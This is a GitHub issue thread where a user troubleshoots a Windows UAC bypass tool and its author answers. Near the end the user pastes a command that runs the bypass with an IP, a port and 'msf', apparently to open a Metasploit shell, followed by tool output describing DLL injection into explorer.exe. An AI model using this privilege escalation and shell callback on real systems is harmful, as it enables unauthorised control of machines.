Open gearcapitan opened 8 years ago
Cn33liz
commented
8 years ago Are you sure your user is member of the local administrator group? How are the UAC settings (This bypass only works if UAC setting are default)?
Do you have the latest Windows 10 Anniversary update installed? Otherwise you need this version of the bypass: https://github.com/Cn33liz/TpmInitUACAnniversaryBypass
gearcapitan
commented
8 years ago first answer, yes second answer, yes third answer, yes
and also not only that, besides also am now having problems with my windows, so the message wbemprox.dll error, some programs no longer start because they say they do not have sufficient permissions to start the service or application, although right click, and run as administrator, some applications do not work, I can not not install other because it says that the service can not start due to lack of permits, as I fix it? and neither my virtual machines can run: '(,
Cn33liz
commented
8 years ago The problem is that you probably used the wrong version of the bypass (you needed the Anniversary version) , so the dll could not remove itself. Please remove the wbemcomn.dll from the C:\windows\system32\wbem folder. If you cannot remove it (because it's in use), please reboot Windows in command prompt modus and delete the file. Next time; please read the readme before running tools like this.
gearcapitan
commented
8 years ago and I did, but still the problem persists, some srevicios not start due to lack of privileges, it's like now my pc was a standard user even if this in the local administrator account, still can not reinstall vmware workstation, the thing is maso less so, so qui did was done as is the manual, my windows if the version of anniversary, but when you run the program did not send me the shell, then thought to open a terminal as administrator to run the program as they so obiamente haria bypass the system, but depues that the problems started https://gyazo.com/fc1b9e7a5b15c55a3a72353190289737
Cn33liz
commented
8 years ago I don't know what the problem is with your system. If you succesfully deleted the wbemcomn dll from c:\windows\system32\wbem, then you shouldn't have any problems caused by running this tool. If you want to test this tool, please read the readme or my blogpost and use the correct version. Always make snapshots from vm's before testing, or create a restore point within Windows, so if something goes wrong you can always restore to a previous working state.
gearcapitan
commented
8 years ago hello me again, sorry for the pain this time compile the code manually in visual studio and yet the message of the picture I get, and I get on my local machine and on my virtual machines, forget all this that postie that and fix it, but I mean not simply step !, Oops something went wrong recivi be that any upgrade to patch the vulnerability? you can try more
hola yo otra vez, perdon por el fastidio, esta vez compile el codigo manualmente en visual studio y aun asi me sale el mensaje del la imagen, y me sale en mi maquina local y en mis maquinas virtuales, olvida todo lo anterior que postie eso ya lo arregle, pero osea simplemente no paso de Oops something went wrong!, sera que recivi alguna actualizacion que parcho la vulnerabilidad? que mas puedo intentar
C:\Users\Pentesting>C:\Users\Pentesting\Desktop\TpmInitUACBypass.exe 192.168.0.66 668 msf
/_ / / / () / / / / \/ ' / // \/ / **/ // / .**///_/////// /_/ UAC Suicide Squad By Cn33liz 2016
[] Dropping needed DLL's from memory -> Done! [] Write parameters into config file -> Done! [] Now injecting the IFileOperation DLL into explorer.exe process.... [] And use the IFileOperation::CopyItem method to copy our DLL -> Oops something went wrong!
................................. other errors
https://gyazo.com/c207fa6d0cd51ef0b549dac477689d14 https://gyazo.com/b54b776240db79138c328771e16b91ae